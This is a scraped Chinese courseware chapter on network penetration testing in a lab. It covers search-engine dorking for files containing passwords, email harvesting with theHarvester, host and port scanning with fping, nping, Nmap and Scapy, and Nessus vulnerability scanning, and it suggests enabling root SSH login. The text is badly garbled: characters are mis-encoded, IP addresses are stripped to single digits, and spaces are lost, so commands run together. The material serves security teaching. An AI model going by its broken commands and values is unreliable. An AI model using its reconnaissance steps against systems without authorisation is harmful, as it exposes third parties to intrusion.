《計(jì)算機(jī)網(wǎng)絡(luò)安全防護(hù)技術(shù)(第二版)》課件 (秦?zé)觯┑?章 網(wǎng)絡(luò)安全滲透測(cè)試技術(shù)_第1頁(yè)
《計(jì)算機(jī)網(wǎng)絡(luò)安全防護(hù)技術(shù)(第二版)》課件 (秦?zé)觯┑?章 網(wǎng)絡(luò)安全滲透測(cè)試技術(shù)_第2頁(yè)
《計(jì)算機(jī)網(wǎng)絡(luò)安全防護(hù)技術(shù)(第二版)》課件 (秦?zé)觯┑?章 網(wǎng)絡(luò)安全滲透測(cè)試技術(shù)_第3頁(yè)
《計(jì)算機(jī)網(wǎng)絡(luò)安全防護(hù)技術(shù)(第二版)》課件 (秦?zé)觯┑?章 網(wǎng)絡(luò)安全滲透測(cè)試技術(shù)_第4頁(yè)
《計(jì)算機(jī)網(wǎng)絡(luò)安全防護(hù)技術(shù)(第二版)》課件 (秦?zé)觯┑?章 網(wǎng)絡(luò)安全滲透測(cè)試技術(shù)_第5頁(yè)
已閱讀5頁(yè),還剩71頁(yè)未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說(shuō)明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡(jiǎn)介

第6章

網(wǎng)絡(luò)安全滲透測(cè)試技術(shù)任務(wù)6.1-6.3搭建實(shí)驗(yàn)拓?fù)浜蛯W(xué)習(xí)預(yù)備知識(shí)

一直以來(lái),小張都參與了A公司的網(wǎng)絡(luò)安全建設(shè),通過(guò)之前的一系列的建設(shè),已取得了一定的成效。為了進(jìn)一步查找和修補(bǔ)公司網(wǎng)絡(luò)的漏洞、提升公司網(wǎng)絡(luò)系統(tǒng)的安全性,A公司決定聘請(qǐng)網(wǎng)絡(luò)安全專家為公司的網(wǎng)絡(luò)進(jìn)行安全滲透測(cè)試。

滲透測(cè)試起源于美國(guó)的軍事演習(xí)。20世紀(jì)90年代,美國(guó)將其傳統(tǒng)的軍事演習(xí)引入到計(jì)算機(jī)網(wǎng)絡(luò)及信息安全基礎(chǔ)設(shè)施的攻防測(cè)試中,由安全專家組成的“紅隊(duì)”向接受測(cè)試的“藍(lán)隊(duì)”進(jìn)行攻擊,檢驗(yàn)“藍(lán)隊(duì)”安全防御體系的有效性。這種通過(guò)實(shí)際攻擊進(jìn)行安全測(cè)試與評(píng)估的方法就是滲透測(cè)試(PenetrationTesting)。

本章將介紹使用KaliLinux進(jìn)行滲透測(cè)試的方法,拓?fù)淙鐖D6-1-1所示。攻擊者與被攻擊者都位于公司的DMZ區(qū)域,通過(guò)NAT連接到Internet。攻擊者使用KaliLinux系統(tǒng),IP地址是1;被攻擊者Linux服務(wù)器,IP地址是2;被攻擊者win2003服務(wù)器,IP地址是3;被攻擊者win2008服務(wù)器,IP地址是4。圖6-1-1網(wǎng)絡(luò)安全滲透測(cè)試實(shí)驗(yàn)拓?fù)?/p>

其基本配置如下:1.啟動(dòng)VMwareWorkstation。2.將KaliLinux連接到關(guān)聯(lián)NAT的交換機(jī)Vmnet8。3.將KaliLinux的IP地址配置為1,網(wǎng)關(guān)指向。root@kali:~#vim/etc/network/interfacesautoeth0ifaceeth0inetstaticaddress1netmaskgatewaypre-upifconfigeth0hwether60:60:60:60:60:604.在KaliLinux上進(jìn)行ping百度網(wǎng)站的測(cè)試,命令如下:root@kali:~#ping測(cè)試結(jié)果是能ping通,證明該KaliLinux電腦能正常解析域名并訪問(wèn)Internet上的服務(wù)器。5.三臺(tái)服務(wù)器的IP地址按上面的規(guī)劃配置,子網(wǎng)掩碼為。6.1滲透測(cè)試的步驟滲透測(cè)試的主要步驟是:1.信息收集通過(guò)Internet、社會(huì)工程等手段,了解目標(biāo)的相關(guān)信息。2.掃描通過(guò)掃描軟件對(duì)目標(biāo)進(jìn)行掃描,獲取開(kāi)放的主機(jī)、端口、漏洞等信息。3.實(shí)施攻擊、獲取權(quán)限對(duì)目標(biāo)主機(jī)實(shí)施拒絕服務(wù)等攻擊,破壞其正常的運(yùn)行?;蚶媚繕?biāo)主機(jī)的漏洞,直接或間接的獲取控制權(quán)。4.消除痕跡、保持連接攻擊者入侵獲取控制權(quán)后,通過(guò)清除系統(tǒng)日志、更改系統(tǒng)設(shè)置,種植木馬等方式,遠(yuǎn)程操控目標(biāo)主機(jī)而又不被發(fā)現(xiàn)。5.生成評(píng)估報(bào)告對(duì)發(fā)現(xiàn)的安全問(wèn)題及后果進(jìn)行評(píng)估,給出技術(shù)解決方案,幫助被評(píng)估者修補(bǔ)和提升系統(tǒng)的安全性。6.2信息收集

常用的收集信息的方法有社會(huì)工程學(xué)法、谷歌黑客技術(shù)等。社會(huì)工程學(xué)法是利用人的弱點(diǎn),如人的本能反應(yīng)、好奇心、貪便宜等,進(jìn)行欺騙,獲取利益的方法。谷歌黑客技術(shù)是利用谷歌、百度等搜索引擎,收集有價(jià)值的信息的方法。一、谷歌黑客技術(shù)的基本語(yǔ)法and連接符同時(shí)對(duì)所有關(guān)鍵字進(jìn)行搜索or連接符從幾個(gè)關(guān)鍵字中,任一個(gè)匹配就可以intext:搜索正文部分,忽略標(biāo)題、URL等文字intitle:搜索標(biāo)題部分inurl:搜索網(wǎng)頁(yè)URL部分allintext:搜索正文部分,配置條件是包含全部關(guān)鍵字allintitle:搜索標(biāo)題部分,配置條件是包含全部關(guān)鍵字allinurl:搜索網(wǎng)頁(yè)URL部分,配置條件是包含全部關(guān)鍵字site:限定域名link:包含指定鏈接filetype:指定文件后綴或擴(kuò)展名*代表多個(gè)字母.代表一個(gè)字母“”精確匹配,可指定空格+加入關(guān)鍵字-送去關(guān)鍵字~同意詞二、應(yīng)用舉例1.通過(guò)搜索引擎搜索管理后臺(tái)如通過(guò)百度或谷歌搜索引擎搜索“inurl:phpintitle:管理員登陸”,可搜索到用php開(kāi)發(fā)的管理員登錄網(wǎng)站頁(yè)面。2.通過(guò)搜索引擎搜索敏感文件如通過(guò)打開(kāi)G分別輸入以下搜索內(nèi)容,能搜索到網(wǎng)站上擴(kuò)展名是doc、xls的文件:site:filetype:docintext:passsite:filetype:xlsintext:pass3.通過(guò)郵箱挖掘器theHarvester可利用搜索引擎收集電子郵件地址。例如,在kaliLinux中,執(zhí)行以下命令:root@kali:~#theharvester-d163.com-l300-bbaidu以上命令的作用是搜索域名為163.com的郵件地址,搜索來(lái)源是baidu。除了baidu,可選的搜索來(lái)源還有g(shù)oogle、bing、pgp、linkedin等。6.3掃描

掃描相當(dāng)于入侵之前的“踩點(diǎn)”,主要是為了收集被攻擊者的信息。掃描可分為端口類(lèi)掃描和漏洞類(lèi)掃描。端口類(lèi)掃描用于檢測(cè)目標(biāo)主機(jī)是否在線、開(kāi)放了哪些端口、運(yùn)行了哪些服務(wù)、運(yùn)行的是什么操作系統(tǒng)、運(yùn)行了哪些軟件;漏洞類(lèi)掃描主要用于掃描主機(jī)開(kāi)放的端口、運(yùn)行的服務(wù)、運(yùn)行的操作系統(tǒng)和軟件有什么漏洞。

ping掃描是最原始的主機(jī)存活掃描技術(shù),但有些系統(tǒng)如win7系統(tǒng)由于安全的需要,默認(rèn)就不允許別人ping自己,所以ping掃描成功率并不大。為提高成功率,直連的主機(jī)可用基于ARP的掃描;非直連的主機(jī)可采用基于TCP的掃描。6.3.1fping掃描fping掃描類(lèi)似于ping命令,但ping命令一次只能ping一個(gè)地址,而fping一次可以ping多個(gè)地址,而且速度更快。(一)fping命令常用的參數(shù):-a:在結(jié)果中顯示出所有可ping通的目標(biāo)。-q:安靜模式,不顯示每個(gè)目標(biāo)ping的結(jié)果。-f:從用戶事先定義好的指定文件中獲取目標(biāo)列表。-g:指定目標(biāo)列表,有兩種形式:形式1指定開(kāi)始和結(jié)束地址,如-g55。形式2指定網(wǎng)段和子網(wǎng)掩碼,如-g/24其中,-f與-g只能選擇其一,不能同時(shí)使用。(二)舉例說(shuō)明1.通過(guò)定義目標(biāo)列表文件的方式進(jìn)行掃描1)編輯列表文件root@kali:~#vimHostList輸入以下內(nèi)容:2342)運(yùn)行命令root@kali:~#fping-a-q-fHostList23以上三行是命令輸出的內(nèi)容,列出了所有可ping通的目標(biāo)。@kali:~#fping-g54-a-q1233.將掃描結(jié)果輸出到文件1)輸入命令root@kali:~#fping-g54-a-q>Ahost2)查看結(jié)果root@kali:~#catAhost1236.3.2nping掃描

通過(guò)ping來(lái)掃描存活主機(jī)成功率不大,為提高成功率,直連的主機(jī)可用基于ARP的掃描;非直連的主機(jī)可采用基于TCP的掃描。nping掃描支持TCP、UDP、ICMP和ARP等多種協(xié)議。例如,它能通過(guò)tcp連接目標(biāo)主機(jī)的某個(gè)端口,來(lái)測(cè)試目標(biāo)主機(jī)是否存活。通過(guò)發(fā)送TCP的syn,根據(jù)是否有回復(fù)syn、ack或回復(fù)reset,來(lái)測(cè)試對(duì)方是否存活。

nping常用的參數(shù)有:-c數(shù)量:表示發(fā)送給目標(biāo)主機(jī)的測(cè)試包的數(shù)量。-p端口號(hào):表示目標(biāo)主機(jī)的端口號(hào),根據(jù)目標(biāo)主機(jī)是否有回復(fù)以及回復(fù)的信息可獲得目標(biāo)主機(jī)是否存洛以及是否開(kāi)啟了相關(guān)服務(wù)。--tcp:表示發(fā)送tcp類(lèi)型的數(shù)據(jù)包。例如,輸入以下命令:root@kali:~#nping-c1-p802-15--tcp輸出如下:StartingNping0.7.70(/nping)at2018-12-2623:12ESTSENT(0.0443s)TCP1:57744>2:80Sttl=64id=2420iplen=40seq=2050265291win=1480//上面一行表示1向2的80號(hào)端口發(fā)送了TCP的syn。RCVD(0.0453s)TCP2:80>1:57744SAttl=64id=0iplen=44seq=2409067941win=5840<mss1460>//上面一行說(shuō)明2回復(fù)了syn和ack,表示它開(kāi)發(fā)了http服務(wù)。SENT(1.0454s)TCP1:57744>3:80Sttl=64id=2420iplen=40seq=2050265291win=1480RCVD(1.0486s)TCP3:80>1:57744SAttl=128id=43708iplen=44seq=430410675win=64320<mss1460>SENT(2.0505s)TCP1:57744>4:80Sttl=64id=2420iplen=40seq=2050265291win=1480SENT(3.0525s)TCP1:57744>5:80Sttl=64id=2420iplen=40seq=2050265291win=1480//上面一行表示1向5的80號(hào)端口發(fā)送了TCP的syn。通過(guò)觀察,之后并沒(méi)有收到5的回復(fù),因此判斷5沒(méi)有開(kāi)放80端口。Statisticsforhost2:|ProbesSent:1|Rcvd:1|Lost:0(0.00%)|_Maxrtt:0.725ms|Minrtt:0.725ms|Avgrtt:0.725ms//上面一行表示向2發(fā)送了1個(gè)包,收到1個(gè)回復(fù),丟包率是0。Statisticsforhost3:|ProbesSent:1|Rcvd:1|Lost:0(0.00%)|_Maxrtt:2.711ms|Minrtt:2.711ms|Avgrtt:2.711msStatisticsforhost4:|ProbesSent:1|Rcvd:0|Lost:1(100.00%)|_Maxrtt:N/A|Minrtt:N/A|Avgrtt:N/AStatisticsforhost5:|ProbesSent:1|Rcvd:0|Lost:1(100.00%)|_Maxrtt:N/A|Minrtt:N/A|Avgrtt:N/A//上面一行表示向5發(fā)送了1個(gè)包,收到0個(gè)回復(fù),丟包率是100%。Rawpacketssent:4(160B)|Rcvd:2(92B)|Lost:2(50.00%)Npingdone:4IPaddressespingedin4.09seconds6.3.3NMAP掃描

Nmap是綜合性的端口掃描工具,可用于主機(jī)發(fā)現(xiàn)、開(kāi)放服務(wù)及版本檢測(cè)、操作系統(tǒng)檢測(cè)、網(wǎng)絡(luò)追蹤等。Nmap指定目標(biāo)地址范圍的形式舉例如下:232-15/24-exclude2其中,exclude后面為排除的IP地址。還可以將地址范圍以列表的形式存放在文件中,如將IP地址的列表存放在hosts.txt文件中,可以用以下形式引用地址范圍:-iLhosts.txt-excludefilehosts.txt一、Nmap的ping掃描Nmap的Ping掃描迅速找出指定范圍內(nèi),允許Ping的主機(jī)的IP地址、MAC地址。它的參數(shù)是-sn,舉例如下:root@kali:~#nmap-sn/24StartingNmap7.70()at2018-12-3001:04ESTNmapscanreportforHostisup(0.00087slatency).MACAddress:00:50:56:E1:7E:5F(VMware)NmapscanreportforHostisup(0.00069slatency).MACAddress:00:50:56:C0:00:08(VMware)Nmapscanreportfor0Hostisup(0.00017slatency).MACAddress:00:0C:29:EE:A8:5A(VMware)Nmapscanreportfor2Hostisup(0.0027slatency).MACAddress:00:0C:29:AE:F7:74(VMware)Nmapscanreportfor3Hostisup(0.00014slatency).MACAddress:00:0C:29:09:18:C6(VMware)Nmapscanreportfor4Hostisup(0.00024slatency).MACAddress:00:0C:29:86:3A:9C(VMware)Nmapscanreportfor1Hostisup.Nmapdone:256IPaddresses(7hostsup)scannedin1.93seconds二、Nmap的TCP/UDP掃描1.TCPConnect掃描

TCPConnect掃描是通過(guò)操作系統(tǒng)提供的系統(tǒng)調(diào)用connect()來(lái)打開(kāi)連接的,如果有成功返回,表示目標(biāo)端口正在監(jiān)聽(tīng);否則表示目標(biāo)端口不在監(jiān)聽(tīng)。這種掃描是最基本的TCP掃描,但容易被檢測(cè)到。root@kali:~#nmap-sT4StartingNmap7.70()at2018-12-3003:29ESTNmapscanreportfor4Hostisup(0.00097slatency).Notshown:990closedportsPORTSTATESERVICE80/tcpopenhttp135/tcpopenmsrpc139/tcpopennetbios-ssn445/tcpopenmicrosoft-ds3306/tcpopenmysql49152/tcpopenunknown49153/tcpopenunknown49154/tcpopenunknown49155/tcpopenunknown49156/tcpopenunknownMACAddress:00:0C:29:86:3A:9C(VMware)Nmapdone:1IPaddress(1hostup)scannedin1.82seconds2.TCPSYN掃描

TCPSYN掃描首先嘗試向?qū)Ψ降哪硞€(gè)端口發(fā)出一個(gè)SYN包,

若對(duì)方返回SYN-ACK包,表示對(duì)方端口正在監(jiān)聽(tīng),

如果對(duì)方返回RST包,表示對(duì)方端口不在監(jiān)聽(tīng)。

針對(duì)對(duì)方返回的SYN-ACK包,攻擊者主機(jī)會(huì)馬上發(fā)出一個(gè)RST包斷開(kāi)與對(duì)方的連接,轉(zhuǎn)入下一個(gè)端口的測(cè)試。

由于不必完全打開(kāi)一個(gè)TCP連接,所以TCPSYN掃描也被稱為半開(kāi)掃描。Nmap的TCPSYN掃描命令如下:root@kali:~#nmap-sS4StartingNmap7.70()at2018-12-3003:27ESTNmapscanreportfor4Hostisup(0.00041slatency).Notshown:990closedportsPORTSTATESERVICE80/tcpopenhttp135/tcpopenmsrpc139/tcpopennetbios-ssn445/tcpopenmicrosoft-ds3306/tcpopenmysql49152/tcpopenunknown49153/tcpopenunknown49154/tcpopenunknown49155/tcpopenunknown49156/tcpopenunknownMACAddress:00:0C:29:86:3A:9C(VMware)Nmapdone:1IPaddress(1hostup)scannedin1.60seconds3.TCPFIN掃描

采用TCPSYN掃描某個(gè)端口時(shí),若對(duì)方既不回復(fù)ACK包,也不回復(fù)RST包,則無(wú)法判斷對(duì)方端口的狀態(tài)。

這時(shí),可采用TCPFIN掃描作進(jìn)一步的判斷。

若FIN包到達(dá)一個(gè)監(jiān)聽(tīng)端口,會(huì)被丟棄;

相反的,若FIN包到達(dá)一個(gè)關(guān)閉的端口,則會(huì)回應(yīng)RST。root@kali:~#nmap-sF2StartingNmap7.70()at2018-12-3003:32ESTNmapscanreportfor2Hostisup(0.00034slatency).Notshown:988closedportsPORTSTATESERVICE21/tcpopen|filtered ftp22/tcpopen|filtered ssh23/tcpopen|filtered telnet25/tcpopen|filtered smtp53/tcpopen|filtered domain80/tcpopen|filtered http139/tcpopen|filtered netbios-ssn445/tcpopen|filtered microsoft-ds3306/tcpopen|filtered mysql5432/tcpopen|filtered postgresql8009/tcpopen|filtered ajp138180/tcpopen|filtered unknownMACAddress:00:0C:29:AE:F7:74(VMware)Nmapdone:1IPaddress(1hostup)scannedin1.46seconds2.UDP掃描

UDP掃描用來(lái)確定對(duì)方主機(jī)的哪個(gè)UDP端口開(kāi)放。

UDP掃描發(fā)送零字節(jié)的信息包給對(duì)方端口,若收到回復(fù)端口不可達(dá),表示該端口的關(guān)閉的,

若無(wú)回復(fù),則認(rèn)為對(duì)方端口是開(kāi)放的。

UDP掃描耗時(shí)較長(zhǎng),參數(shù)是-sU,例如:root@kali:~#nmap-sU2StartingNmap7.70()at2018-12-3003:34ESTNmapscanreportfor2Hostisup(0.00054slatency).Notshown:997closedportsPORTSTATESERVICE53/udpopendomain137/udpopennetbios-ns138/udpopen|filterednetbios-dgmMACAddress:00:0C:29:AE:F7:74(VMware)Nmapdone:1IPaddress(1hostup)scannedin2032.28seconds三、端口服務(wù)及版本掃描

Nmap能較準(zhǔn)確的判斷出目標(biāo)主機(jī)開(kāi)放的端口服務(wù)類(lèi)型及版本,而不是簡(jiǎn)單的根據(jù)端口號(hào)對(duì)應(yīng)到相應(yīng)的服務(wù),

如http服務(wù)被從默認(rèn)的80號(hào)端口修改為其它端口號(hào),也能判斷出來(lái)。端口服務(wù)及版本掃描的參數(shù)是-sV,如:root@kali:~#nmap-sV4StartingNmap7.70()at2018-12-3007:55ESTNmapscanreportfor4Hostisup(0.00039slatency).Notshown:990closedportsPORTSTATESERVICEVERSION80/tcpopenhttpApachehttpd2.4.23((Win32)OpenSSL/1.0.2jPHP/5.4.45)135/tcpopenmsrpcMicrosoftWindowsRPC139/tcpopennetbios-ssnMicrosoftWindowsnetbios-ssn445/tcpopenmicrosoft-dsMicrosoftWindowsServer2008R2-2012microsoft-ds3306/tcpopenmysqlMySQL(unauthorized)49152/tcpopenmsrpcMicrosoftWindowsRPC49153/tcpopenmsrpcMicrosoftWindowsRPC49154/tcpopenmsrpcMicrosoftWindowsRPC49155/tcpopenmsrpcMicrosoftWindowsRPC49156/tcpopenmsrpcMicrosoftWindowsRPCMACAddress:00:0C:29:86:3A:9C(VMware)ServiceInfo:OSs:Windows,WindowsServer2008R2-2012;CPE:cpe:/o:microsoft:windowsServicedetectionperformed.Pleasereportanyincorrectresultsat/submit/.Nmapdone:1IPaddress(1hostup)scannedin60.56seconds四、綜合掃描

綜合掃描會(huì)同時(shí)打開(kāi)OS指紋和版本探測(cè)。命令的參數(shù)是-A,如:root@kali:~#nmap-A4StartingNmap7.70()at2018-12-3008:00ESTNmapscanreportfor4Hostisup(0.00050slatency).Notshown:990closedportsPORTSTATESERVICEVERSION80/tcpopenhttpApachehttpd2.4.23((Win32)OpenSSL/1.0.2jPHP/5.4.45)|http-methods:|_Potentiallyriskymethods:TRACE|_http-server-header:Apache/2.4.23(Win32)OpenSSL/1.0.2jPHP/5.4.45|_http-title:403Forbidden135/tcpopenmsrpcMicrosoftWindowsRPC139/tcpopennetbios-ssnMicrosoftWindowsnetbios-ssn445/tcpopenmicrosoft-dsWindowsServer2008R2Enterprise7601ServicePack1microsoft-ds3306/tcpopenmysqlMySQL(unauthorized)49152/tcpopenmsrpcMicrosoftWindowsRPC49153/tcpopenmsrpcMicrosoftWindowsRPC49154/tcpopenmsrpcMicrosoftWindowsRPC49155/tcpopenmsrpcMicrosoftWindowsRPC49156/tcpopenmsrpcMicrosoftWindowsRPCMACAddress:00:0C:29:86:3A:9C(VMware)Devicetype:generalpurposeRunning:MicrosoftWindows7|2008|8.1OSCPE:cpe:/o:microsoft:windows_7::-cpe:/o:microsoft:windows_7::sp1cpe:/o:microsoft:windows_server_2008::sp1cpe:/o:microsoft:windows_server_2008:r2cpe:/o:microsoft:windows_8cpe:/o:microsoft:windows_8.1OSdetails:MicrosoftWindows7SP0-SP1,WindowsServer2008SP1,WindowsServer2008R2,Windows8,orWindows8.1Update1NetworkDistance:1hopServiceInfo:OSs:Windows,WindowsServer2008R2-2012;CPE:cpe:/o:microsoft:windowsHostscriptresults:|_clock-skew:mean:-2h40m00s,deviation:4h37m07s,median:0s|_nbstat:NetBIOSname:WIN-U8QM4SRH0MR,NetBIOSuser:<unknown>,NetBIOSMAC:00:0c:29:86:3a:9c(VMware)|smb-os-discovery:|OS:WindowsServer2008R2Enterprise7601ServicePack1(WindowsServer2008R2Enterprise6.1)|OSCPE:cpe:/o:microsoft:windows_server_2008::sp1|Computername:WIN-U8QM4SRH0MR|NetBIOScomputername:WIN-U8QM4SRH0MR\x00|Workgroup:WORKGROUP\x00|_Systemtime:2018-12-30T21:01:14+08:00|smb-security-mode:|account_used:guest|authentication_level:user|challenge_response:supported|_message_signing:disabled(dangerous,butdefault)|smb2-security-mode:|2.02:|_Messagesigningenabledbutnotrequired|smb2-time:|date:2018-12-3008:01:14|_start_date:2018-01-0109:35:49TRACEROUTEHOPRTTADDRESS10.50ms4OSandServicedetectionperformed.Pleasereportanyincorrectresultsat/submit/.Nmapdone:1IPaddress(1hostup)scannedin102.75seconds6.3.4全能工具Scapy

全能工具Scapy能讓我們自行構(gòu)造出各種數(shù)據(jù)包,實(shí)現(xiàn)端口掃描等功能。例如通過(guò)Scapy可以構(gòu)造出一個(gè)SYN包,發(fā)送給目標(biāo)主機(jī)某端口,若收到目標(biāo)主機(jī)的SYN-ACK包,表示目標(biāo)主機(jī)的相應(yīng)端口是開(kāi)放的。一、進(jìn)入scapy界面構(gòu)造包進(jìn)入scapy界面,構(gòu)造一個(gè)包,并查看構(gòu)造的包,方法如下:root@kali:~#scapyWARNING:NoroutefoundforIPv6destination::(nodefaultroute?)INFO:Can'timportpythonecdsalib.DisabledcertificatemanipulationtoolsWelcometoScapy(2.3.3)>>>a=Ether()/IP()/TCP()//構(gòu)造一個(gè)包>>>a.show()//查看這個(gè)包###[Ethernet]###dst=ff:ff:ff:ff:ff:ffsrc=00:00:00:00:00:00type=0x800###[IP]###version=4ihl=Nonetos=0x0len=Noneid=1flags=frag=0ttl=64proto=tcpchksum=Nonesrc=dst=\options\###[TCP]###sport=ftp_datadport=httpseq=0ack=0dataofs=Nonereserved=0flags=Swindow=8192chksum=Noneurgptr=0options={}二、ping測(cè)試1.構(gòu)造包>>>b=IP(dst='4')/ICMP()/b'Helloworld'>>>b.show()###[IP]###version=4ihl=Nonetos=0x0len=Noneid=1flags=frag=0ttl=64proto=icmpchksum=Nonesrc=1dst=4\options\###[ICMP]###type=echo-requestcode=0chksum=Noneid=0x0seq=0x0###[Raw]###load='Helloworld'2.發(fā)送和接收一個(gè)三層的數(shù)據(jù)包,把接收到的結(jié)果賦值給reply01。

命令是sr1,含義是send并receive1個(gè)包。>>>reply01=sr1(b)Beginemission:.Finishedtosend1packets..*Received3packets,got1answers,remaining0packets>>>

常見(jiàn)發(fā)送和接收數(shù)據(jù)包的命令函數(shù)有:sr()表示發(fā)送三層的數(shù)據(jù)包,接收一個(gè)或多個(gè)響應(yīng)包。sr1()表示發(fā)送和接收一個(gè)三層的數(shù)據(jù)包srp()表示發(fā)送二層數(shù)據(jù)包,并接收響應(yīng)包send()表示只發(fā)送三層數(shù)據(jù)包,不接收sendp()表示只發(fā)送二層數(shù)據(jù)包,不接收3.查看接收到的響應(yīng)包>>>reply01.show<boundmethodIP.showof<IPversion=4Lihl=5Ltos=0x0len=39id=6907flags=frag=0Lttl=128proto=icmpchksum=0xa70src=4dst=1options=[]|<ICMPtype=echo-replycode=0chksum=0x8e31id=0x0seq=0x0|<Rawload='Helloworld'|<Paddingload='\x00\x00\x00\x00\x00\x00\x00'|>>>>>

可以看到,響應(yīng)包是由對(duì)方發(fā)起,自己是接收方,響應(yīng)包的內(nèi)容是自己發(fā)給對(duì)方的副本“Helloworld”。4.提取響應(yīng)包的詳細(xì)信息1)查看返回的字段與值>>>reply01.getlayer(IP).fields{'frag':0L,'src':'4','proto':1,'tos':0,'dst':'1','chksum':2672,'len':39,'options':[],'version':4L,'flags':0L,'ihl':5L,'ttl':128,'id':6907}>>>上面這條命令,查看到響應(yīng)包的所有IP字段及對(duì)應(yīng)的值>>>reply01.getlayer(IP).fields['src']'4'上面這條命令,查看到了響應(yīng)包的源IP地址字段及值>>>reply01.getlayer(IP).fields['dst']'1'上面這條命令,查看到了響應(yīng)包的目標(biāo)IP地址字段及值>>>reply01.getlayer(ICMP).fields{'gw':None,'code':0,'ts_ori':None,'addr_mask':None,'seq':0,'nexthopmtu':None,'ptr':None,'unused':None,'ts_rx':None,'length':None,'chksum':36401,'reserved':None,'ts_tx':None,'type':0,'id':0}上面這條命令,查看到響應(yīng)包的所有ICMP字段及對(duì)應(yīng)的值>>>reply01.getlayer(ICMP).fields['type']0上面這條命令,查看到響應(yīng)包中,ICMP的type字段對(duì)應(yīng)的值是0。6.3.5Nessus掃描工具

Nessus是常用的漏洞類(lèi)掃描工具,掃描到漏洞后,管理員可針對(duì)漏洞對(duì)系統(tǒng)進(jìn)行加固,攻擊者可針對(duì)漏洞實(shí)施入侵。漏洞掃描分為特征碼探測(cè)和模擬攻擊兩種方式。特征碼探測(cè)時(shí),會(huì)向?qū)Ψ桨l(fā)送包含特征探測(cè)碼的數(shù)據(jù)包,根據(jù)返回的數(shù)據(jù)包中是否包含相應(yīng)特征碼,來(lái)判斷漏洞是否存在;模擬攻擊測(cè)試時(shí),通過(guò)模擬黑客行為攻擊目標(biāo),若攻擊成功,則表示漏洞存在。一、下載Nessus在KaliLinux中用瀏覽器打開(kāi)“/downloads/nessus”,官網(wǎng)會(huì)根據(jù)KaliLinux的操作系統(tǒng)類(lèi)型自動(dòng)選擇和推薦下載相應(yīng)平臺(tái)的Nessus安裝包。也可先通過(guò)真機(jī)下載Nessus安裝包(平臺(tái)類(lèi)型選“Dibian/KaliLinux”類(lèi)型),再在真機(jī)上用WinSCP軟件將已經(jīng)下載的安裝包復(fù)制到KaliLinux上。使用WinSCP軟件前需在kaliLinux上用“vim/etc/ssh/sshd_config”命令編輯sshd_config文件,為sshd_config文件添加“PasswordAuthenticationyes”和“PermitRootLoginyes”這兩行語(yǔ)句;然后用“servicesshstart”命令開(kāi)啟SSH服務(wù)。二、安裝、注冊(cè)和部署Nessus1.在KaliLinux的命令行界面中,進(jìn)入安裝文件所在目錄,運(yùn)行以下命令進(jìn)行安裝:#dpkg-iNessus-10.6.4-debian10_amd64.deb//后面的名字是安裝包的文件名2.啟動(dòng)Nessus服務(wù),命令如下:#servicenessusdstart3.查看已啟動(dòng)的Nessus服務(wù)進(jìn)程,命令如下:#netstat-ntpl|grepnessustcp00:8834:*LISTEN7873/nessusdtcp600:::8834:::*LISTEN7873/nessusd4.在瀏覽器中輸入“:8834”打開(kāi)Nessus頁(yè)面,當(dāng)頁(yè)面詢問(wèn)打算部署的產(chǎn)品類(lèi)型時(shí),選擇如圖6-3-1所示的教育版“RegisterforNessusEssentials”,點(diǎn)擊“Continue”按鈕繼續(xù)。5.在后續(xù)出現(xiàn)的窗口中,輸入個(gè)人郵箱等信息進(jìn)行注冊(cè)和獲取激活碼,等待系統(tǒng)自動(dòng)下載、編譯和安裝插件。插件成功安裝后,就可以正常使用Nessus進(jìn)行掃描等操作了。圖6-3-1選擇“RegisterforNessusEssentials”三、用Nessus掃描局域網(wǎng)1.成功部署Nessus后,在瀏覽器的Nessus頁(yè)面中,出現(xiàn)“Scans”和“Settings”兩個(gè)選項(xiàng)夾。點(diǎn)擊“Scans”選項(xiàng)夾,點(diǎn)擊“NewScan”按鈕,在出現(xiàn)的掃描類(lèi)型選項(xiàng)中,點(diǎn)擊創(chuàng)建“AdvancedScan”類(lèi)型的掃描。隨后如圖6-3-2所示,將創(chuàng)建的掃描命名為“Scan01”,將掃描范圍指定為“2,3”,點(diǎn)擊“Save”按鈕。圖6-3-2

創(chuàng)建Scan01掃描2.在掃描列表中,可以看到剛定義好的掃描名稱條“Scan01”,在其后的掃描按鈕圖標(biāo)上點(diǎn)擊,開(kāi)啟新的掃描。開(kāi)啟掃描后,在“Scan01”名稱條上點(diǎn)擊,出現(xiàn)如圖6-3-3所示的掃描實(shí)時(shí)結(jié)果匯總信息。圖6-3-3

掃描實(shí)時(shí)結(jié)果匯總信息3.點(diǎn)擊“3”結(jié)果條,可看到如圖6-3-4所示的對(duì)該windows服務(wù)器掃描獲得的詳細(xì)漏洞結(jié)果,如UnsupportedWebServerDetection、MicrosoftWindowsServer2003UnsupportedInstallationDetection、SMBNULLSessionAuthentication等。圖6-3-4

掃描獲得的詳細(xì)漏洞信息4.如圖6-3-5所示,點(diǎn)擊其中MIXED類(lèi)型的“MicrosoftWindows(MultipleIssues)”項(xiàng),可進(jìn)一步看到MS06-040、MS09-001、MS03-026、MS03-039、MS06-018等嚴(yán)重漏洞。圖6-3-5

“MicrosoftWindows(MultipleIssues)”項(xiàng)信息5.如圖6-3-6所示,點(diǎn)擊其中的MS03-026漏洞條,可進(jìn)一步看到關(guān)于MS03-026漏洞的詳細(xì)信息以及相關(guān)補(bǔ)丁。圖6-3-6

MS03-026漏洞的詳細(xì)信息6.與查看對(duì)windows服務(wù)器掃描的結(jié)果類(lèi)似,點(diǎn)擊如圖6-3-7所示的“2”掃描結(jié)果條,可看到如圖6-3-7所示的對(duì)該Linux服務(wù)器掃描獲得的詳細(xì)漏洞結(jié)果,點(diǎn)擊其中的漏洞條,可進(jìn)一步看到關(guān)于該漏洞的詳細(xì)信息及相關(guān)補(bǔ)丁等防護(hù)措施。圖6-3-7

對(duì)Linux服務(wù)器掃描獲得的漏洞信息

謝謝欣賞第6章

網(wǎng)絡(luò)安全滲透測(cè)試技術(shù)任務(wù)6.4.1通過(guò)圖形界面對(duì)服務(wù)器實(shí)施滲透測(cè)試

